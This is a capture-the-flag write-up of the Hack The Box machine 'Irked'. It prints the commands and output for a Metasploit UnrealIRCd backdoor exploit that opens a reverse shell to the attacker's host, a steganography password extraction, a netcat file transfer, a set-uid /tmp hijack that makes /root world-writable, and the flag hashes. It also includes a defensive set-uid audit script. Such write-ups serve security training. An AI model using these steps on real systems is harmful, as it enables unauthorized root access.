Irked
As always I start with a port scan to get a list of open ports and running services:
```
# Nmap 7.70 scan initiated Sun Nov 18 20:40:15 2018 as: nmap -v -n -T4 -sS -sV -sC -oN nmap.scan -p- 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.029s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          40080/udp  status
|_  100024  1          47737/tcp  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
47737/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 18 20:41:48 2018 -- 1 IP address (1 host up) scanned in 92.87 seconds
```
Some information about the running webserver:
```
HTTP/1.1 200 OK
Date: Sun, 18 Nov 2018 20:00:42 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Mon, 14 May 2018 18:00:02 GMT
ETag: "48-56c2e413aa86b"
Accept-Ranges: bytes
Content-Length: 72
Vary: Accept-Encoding
Content-Type: text/html
```
The browser can’t load the website, but cURL gives some information:
```
root@n0w4n:~/htb/irked# curl -vv 10.10.10.117
* Rebuilt URL to: 10.10.10.117/
*   Trying 10.10.10.117...
* TCP_NODELAY set
* Connected to 10.10.10.117 (10.10.10.117) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.117
> User-Agent: curl/7.61.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Sun, 18 Nov 2018 20:02:29 GMT
< Server: Apache/2.4.10 (Debian)
< Last-Modified: Mon, 14 May 2018 18:00:02 GMT
< ETag: "48-56c2e413aa86b"
< Accept-Ranges: bytes
< Content-Length: 72
< Vary: Accept-Encoding
< Content-Type: text/html
< 
<img src=irked.jpg>
<br>
<b><center>IRC is almost working!</b></center>
* Connection #0 to host 10.10.10.117 left intact
```
There is an old backdoor in UnrealIRCd (version 3.2.8.1) that can be exploited with Metasploit.
```
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 10.10.10.117
rhost => 10.10.10.117
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
rport => 6697
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.8
lhost => 10.10.14.8
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 10.10.14.8:4444 
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo jREAOnEfvR5esDJE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "jREAOnEfvR5esDJE\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.8:4444 -> 10.10.10.117:37970) at 2018-11-18 21:27:38 +0100

id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
python -c 'import pty;pty.spawn("/bin/bash");'
ircd@irked:~/Unreal3.2$ 
```
And it works... now to take a look around.
```
ircd@irked:/tmp/n0w4n$ uname -a
uname -a
Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux
ircd@irked:/tmp/n0w4n$ cat /etc/*-release
cat /etc/*-release
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
```
```
ircd@irked:~$ less .bash_hi
less .bash_history
WARNING: terminal is not fully functional
.bash_history  (press RETURN)
ls
cat aliases
lskeys
ls keys
ls keys/CVS
cd keys
ls
file CVS
cd CVS
ls
ls Root
cat Root/Root
cd Root
ls
file Root
cat Root
cd /
ls
cd /home
ls
cd djmardov
ls
ls *
  Input is not a pipe (press RETURN)
cd /tmp
ls
clear
clear
ls
cd /
ls
cd /var/www/html
ls
cd /tmp
sudo -i
cd /home/ircd
clear
ls
ls -lah
cd ..
ls
cd djmardov
ls
cd Documents
ls -lah
cat .backup
clear
exit
```
So I did some enumeration and did not get very much.
After a while I looked back at what I found and banged my head a few times against the wall for being so blind.
The hint was there for the taking...
The .backup file had some content:
```
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
```
The mention of "steg" made me believe it had to do with steganography... but which file? Nothing I found on the system looked like it would work.
But one file did... I missed it and feel so dumb. The picture on the main page!
```
root@n0w4n:~/htb/irked# steghide --extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
root@n0w4n:~/htb/irked# cat pass.txt
Kab6h+m+bbp2J:HG
```
```
ircd@irked:/tmp$ su djmardov
su djmardov
Password: Kab6h+m+bbp2J:HG
djmardov@irked:/tmp$ id
id
uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
```
```
djmardov@irked:~/Documents$ cat user.txt
cat user.txt
4a66a78b12dc0e661a59d3f5c0267a8e
```
Got user, now for root. I transfer LinEnum to the box with netcat, listening on the target and sending from my machine:
```
djmardov@irked:/tmp$ nc -lp 9999 > linenum.sh
```
```
root@n0w4n:~/htb/irked# nc -w3 10.10.10.117 9999 < linenum.sh
```
This is a nice enumeration tool to use for a quick scan of the system.
After a long look at the report I noticed a file in the SUID list that normally isn't there:
```
[-] SUID files:
-rwsr-xr-- 1 root messagebus 362672 Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43576 May 17  2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17  2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 18072 Sep  8  2016 /usr/bin/pkexec
-rwsr-sr-x 1 root root 9468 Apr  1  2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21  2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29  2015 /bin/umount
```
Running /usr/bin/viewuser shows the following message:
```
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2018-11-26 00:19 (:0)
djmardov pts/0        2018-11-26 13:55 (10.10.14.8)
djmardov pts/1        2018-11-26 13:47 (10.10.14.8)
sh: 1: /tmp/listusers: not found
```
The SUID binary is looking for /tmp/listusers and runs it through sh, but the file doesn't exist. Let's help it.
```
djmardov@irked:~$ ls -lah / | grep root
drwxr-xr-x  21 root root 4.0K May 15  2018 .
drwxr-xr-x  21 root root 4.0K May 15  2018 ..
drwxr-xr-x   2 root root 4.0K May 11  2018 bin
drwxr-xr-x   3 root root 4.0K May 15  2018 boot
drwxr-xr-x  16 root root 3.1K Nov 26 00:19 dev
drwxr-xr-x 135 root root  12K Oct 30 14:51 etc
drwxr-xr-x   4 root root 4.0K May 14  2018 home
lrwxrwxrwx   1 root root   33 May 15  2018 initrd.img -> /boot/initrd.img-3.16.0-6-686-pae
lrwxrwxrwx   1 root root   33 May 11  2018 initrd.img.old -> /boot/initrd.img-3.16.0-4-686-pae
drwxr-xr-x  18 root root 4.0K May 11  2018 lib
drwx------   2 root root  16K May 11  2018 lost+found
drwxr-xr-x   3 root root 4.0K May 11  2018 media
drwxr-xr-x   2 root root 4.0K May 11  2018 mnt
drwxr-xr-x   2 root root 4.0K May 11  2018 opt
dr-xr-xr-x 121 root root    0 Nov 26 00:18 proc
drwx------   2 root root 4.0K Nov  3 04:25 root
drwxr-xr-x  22 root root  820 Nov 26 00:24 run
drwxr-xr-x   2 root root 4.0K Oct 30 14:51 sbin
drwxr-xr-x   2 root root 4.0K May 11  2018 srv
dr-xr-xr-x  13 root root    0 Nov 26 00:18 sys
drwxrwxrwt  11 root root 4.0K Nov 26 14:24 tmp
drwxr-xr-x  10 root root 4.0K May 11  2018 usr
drwxr-xr-x  13 root root 4.0K May 11  2018 var
lrwxrwxrwx   1 root root   29 May 15  2018 vmlinuz -> boot/vmlinuz-3.16.0-6-686-pae
lrwxrwxrwx   1 root root   29 May 11  2018 vmlinuz.old -> boot/vmlinuz-3.16.0-4-686-pae
```
As can be seen, the /root folder has permission 700, so only root can enter it. Because viewuser runs /tmp/listusers as root, a script placed there runs with root privileges:
```
djmardov@irked:/root$ echo "chmod -R 777 /root" > /tmp/listusers && chmod 777 /tmp/listusers
djmardov@irked:/root$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2018-11-26 00:19 (:0)
djmardov pts/0        2018-11-26 13:55 (10.10.14.8)
djmardov pts/1        2018-11-26 13:47 (10.10.14.8)
```
```
djmardov@irked:~$ ls -lah / | grep root
drwxr-xr-x  21 root root 4.0K May 15  2018 .
drwxr-xr-x  21 root root 4.0K May 15  2018 ..
drwxr-xr-x   2 root root 4.0K May 11  2018 bin
drwxr-xr-x   3 root root 4.0K May 15  2018 boot
drwxr-xr-x  16 root root 3.1K Nov 26 00:19 dev
drwxr-xr-x 135 root root  12K Oct 30 14:51 etc
drwxr-xr-x   4 root root 4.0K May 14  2018 home
lrwxrwxrwx   1 root root   33 May 15  2018 initrd.img -> /boot/initrd.img-3.16.0-6-686-pae
lrwxrwxrwx   1 root root   33 May 11  2018 initrd.img.old -> /boot/initrd.img-3.16.0-4-686-pae
drwxr-xr-x  18 root root 4.0K May 11  2018 lib
drwx------   2 root root  16K May 11  2018 lost+found
drwxr-xr-x   3 root root 4.0K May 11  2018 media
drwxr-xr-x   2 root root 4.0K May 11  2018 mnt
drwxr-xr-x   2 root root 4.0K May 11  2018 opt
dr-xr-xr-x 121 root root    0 Nov 26 00:18 proc
drwxrwxrwx   2 root root 4.0K Nov  3 04:25 root
drwxr-xr-x  22 root root  820 Nov 26 00:24 run
drwxr-xr-x   2 root root 4.0K Oct 30 14:51 sbin
drwxr-xr-x   2 root root 4.0K May 11  2018 srv
dr-xr-xr-x  13 root root    0 Nov 26 14:25 sys
drwxrwxrwt  11 root root 4.0K Nov 26 14:24 tmp
drwxr-xr-x  10 root root 4.0K May 11  2018 usr
drwxr-xr-x  13 root root 4.0K May 11  2018 var
lrwxrwxrwx   1 root root   29 May 15  2018 vmlinuz -> boot/vmlinuz-3.16.0-6-686-pae
lrwxrwxrwx   1 root root   29 May 11  2018 vmlinuz.old -> boot/vmlinuz-3.16.0-4-686-pae
```
Looks like the permissions on the /root folder have changed for the better (from 700 to 777).
```
djmardov@irked:/root$ ls -lah
total 28K
drwxrwxrwx  2 root root 4.0K Nov  3 04:25 .
drwxr-xr-x 21 root root 4.0K May 15  2018 ..
lrwxrwxrwx  1 root root    9 Nov  3 04:25 .bash_history -> /dev/null
-rwxrwxrwx  1 root root  570 Jan 31  2010 .bashrc
-rwxrwxrwx  1 root root   12 Nov  3 04:43 .nano_history
-rwxrwxrwx  1 root root   17 May 14  2018 pass.txt
-rwxrwxrwx  1 root root  140 Nov 19  2007 .profile
-rwxrwxrwx  1 root root   33 May 15  2018 root.txt
djmardov@irked:/root$ cat root.txt
8d8e9e8be64654b6dccc3bff4522daf3
```
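The root cause on this box is a set-uid binary that executes a helper from /tmp, a directory every local user can write to. From the defender's side, as an added example that is not part of the writeup or the box, here is a POSIX shell audit that lists set-uid executables and flags any that embed a path under a world-writable directory; the sample tree it builds is constructed, and "viewuser" is only borrowed as a file name.

```shell
#!/bin/sh
# Added audit helper (not from the writeup): find set-uid executables under
# a root directory and report any that embed a path under /tmp, /var/tmp or
# /dev/shm. A privileged program that runs such a path lets any local user
# supply the code it executes as root, which is exactly the viewuser flaw.

# Paths inside directories that any user may write to.
UNSAFE_PATH_RE='/(tmp|var/tmp|dev/shm)/[A-Za-z0-9_./-]+'

# audit_suid_tmp_refs ROOT
# Prints "<suid binary>: <embedded path>" for every suspicious reference.
audit_suid_tmp_refs() {
    root=${1:-/}
    # -perm -4000 selects files with the set-uid bit; -xdev stays on one
    # filesystem so /proc and network mounts are not walked.
    find "$root" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r bin; do
        # grep -a treats the binary as text so embedded strings are matched;
        # -o prints only the matching path, one per line.
        grep -a -o -E "$UNSAFE_PATH_RE" "$bin" 2>/dev/null | sort -u |
        while IFS= read -r ref; do
            printf '%s: %s\n' "$bin" "$ref"
        done
    done
}

# Build a constructed sample tree so the audit can be run offline: one fake
# set-uid helper that references /tmp/listusers and one clean set-uid file.
make_sample_tree() {
    dir=$(mktemp -d)
    printf 'sh -c /tmp/listusers\n' > "$dir/viewuser"
    printf 'nothing suspicious here\n' > "$dir/passwd"
    chmod 4755 "$dir/viewuser" "$dir/passwd"
    printf '%s\n' "$dir"
}

# Run with --demo to audit the sample tree; run with a directory (e.g. /)
# to audit a real system.
if [ "${1:-}" = "--demo" ]; then
    sample=$(make_sample_tree)
    audit_suid_tmp_refs "$sample"
    rm -rf "$sample"
elif [ -n "${1:-}" ]; then
    audit_suid_tmp_refs "$1"
fi
```

A clean system should print nothing; on Irked the expected output would be the line for /usr/bin/viewuser pointing at /tmp/listusers.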
And there we have it. Can't say I really like this machine and the challenge it presented.
It is more a CTF kind of machine than the regular HTB machines, and for something like OSCP training I wouldn't recommend it.
But it does show that enumeration is key.